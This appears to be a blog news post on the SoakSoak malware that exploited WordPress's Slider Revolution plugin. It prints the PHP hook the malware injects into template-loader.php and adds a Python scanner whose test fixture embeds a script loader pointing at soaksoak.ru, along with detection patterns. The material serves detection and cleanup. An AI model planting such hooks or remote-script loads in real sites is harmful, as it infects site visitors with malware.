SoakSoak Malware Compromises +100,000 WordPress Sites

Since Sunday, December 14th, over 100,000 WordPress sites have fallen victim to Russian malware “SoakSoak”. The malware takes advantage of a vulnerability in popular slideshow plugin Slider Revolution (also known as RevSlider) and targets users by redirecting them to SoakSoak . ru and/or downloading malicious files to users’ computers without their knowledge.

Google has already blacklisted over 10,000 infected domains. However, researchers at Sucuri warn that the extent of the damage is far greater, and many site admins may not even know their sites have been affected since RevSlider is often bundled with many WordPress themes. Furthermore, the vulnerability was disclosed back in September, yet many webmasters either had not heard of the vulnerability or didn’t take it seriously until it was too late.

How SoakSoak Works

The SoakSoak malware modifies the wp-includes/template-loader.php file to include the following code:

function FuncQueueObject() {
    wp_enqueue_script("swfobject"); // enqueues the tampered wp-includes/js/swfobject.js on every page
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

This code causes swfobject.js, located in wp-includes/js/, to be loaded on every page of the site, which then loads malware from the SoakSoak . ru domain.

Detecting SoakSoak

Gaming site Dulfy was one of the first WordPress sites to not only detect SoakSoak, but also to remove the malicious code and go behind a firewall. At this time, there is no clear fix other than using a website firewall and updating Slider Revolution to the latest version, and even that is a temporary solution. “The firewall will be a temporary measure until we can figure out what is doing it,” said Dulfy’s owner Kristina Hunter. Simply editing swfobject.js and template-loader.php doesn’t work since it doesn’t fix the vulnerability in RevSlider, and many sites are getting reinfected within minutes. In another blog post today, Sucuri states,

We are hearing a lot of recommendations online to just replace the swfobject.js and template-loader.php files to remove the infection.

It does remove the infection, but does not address the left over backdoors and initial entry points. The website will be reinfected quickly. If you are affected by this, expect to find yourself riddled with backdoors and infections, you have to not only clean, but also stop all malicious attacks. You can stop malicious attacks through the use of a Website Firewall, ours or someone else's, just use a Firewall, a real one preferably.

Sucuri’s Website Malware and Security Scanner can be used to detect sites that have been compromised.
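To illustrate the two indicators the article names, here is an added detection script (not from Sucuri or the original post) that checks template-loader.php for the injected FuncQueueObject hook and compares swfobject.js against a known-good hash while looking for the malware domain. The sample file contents and the known-good hash are constructed for the demonstration, not taken from a real WordPress release.

```python
import hashlib
import re
from pathlib import Path

# Indicators from the report: the hook injected into template-loader.php and
# the tampered swfobject.js that pulls its payload from the soaksoak.ru domain.
INJECTED_HOOK = re.compile(
    r"""add_action\(\s*["']wp_enqueue_scripts["']\s*,\s*["']FuncQueueObject["']\s*\)""")
MALWARE_DOMAIN = re.compile(r"soaksoak\s*\.\s*ru", re.IGNORECASE)


def scan_template_loader(source: str) -> list[str]:
    """Flag the FuncQueueObject definition and hook in a template-loader.php body."""
    findings = []
    if "function FuncQueueObject" in source:
        findings.append("template-loader.php: defines FuncQueueObject")
    if INJECTED_HOOK.search(source):
        findings.append("template-loader.php: hooks FuncQueueObject into wp_enqueue_scripts")
    return findings


def scan_swfobject(source: str, known_good_sha256: str) -> list[str]:
    """Compare swfobject.js against a known-good hash and look for the malware domain."""
    findings = []
    digest = hashlib.sha256(source.encode()).hexdigest()
    if digest != known_good_sha256:
        findings.append(f"swfobject.js: sha256 {digest[:12]} differs from the known-good copy")
    if MALWARE_DOMAIN.search(source):
        findings.append("swfobject.js: references soaksoak.ru")
    return findings


def scan_site(wp_root: Path, known_good_sha256: str) -> list[str]:
    """Run both checks against a WordPress install rooted at wp_root."""
    loader = (wp_root / "wp-includes" / "template-loader.php").read_text(errors="replace")
    swf = (wp_root / "wp-includes" / "js" / "swfobject.js").read_text(errors="replace")
    return scan_template_loader(loader) + scan_swfobject(swf, known_good_sha256)


# Constructed sample files (not real WordPress sources): a stock-looking loader and
# swfobject.js, plus copies carrying the modifications the article describes.
CLEAN_LOADER = "<?php\nif ( defined('WP_USE_THEMES') && WP_USE_THEMES ) {\n    do_action('template_redirect');\n}\n"
INFECTED_LOADER = CLEAN_LOADER + (
    'function FuncQueueObject()\n{\n    wp_enqueue_script("swfobject");\n}\n'
    'add_action("wp_enqueue_scripts", \'FuncQueueObject\');\n')
CLEAN_SWF = "/* constructed stand-in for the stock swfobject.js */\nvar swfobject = {};\n"
KNOWN_GOOD_SHA256 = hashlib.sha256(CLEAN_SWF.encode()).hexdigest()  # would come from a clean release
INFECTED_SWF = CLEAN_SWF + 'var s=document.createElement("script");s.src="//soaksoak.ru/x.js";\n'

if __name__ == "__main__":
    print("clean:", scan_template_loader(CLEAN_LOADER) + scan_swfobject(CLEAN_SWF, KNOWN_GOOD_SHA256))
    print("infected:", scan_template_loader(INFECTED_LOADER) + scan_swfobject(INFECTED_SWF, KNOWN_GOOD_SHA256))
```

A clean result from this script only means these two files look untouched; as Sucuri notes above, the RevSlider entry point and any backdoors left behind must still be dealt with or the site is reinfected.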


I've always been interested in the latest stuff in science and technology, and I'm currently a freshman undergraduate electrical engineering student at the University of Texas at Austin.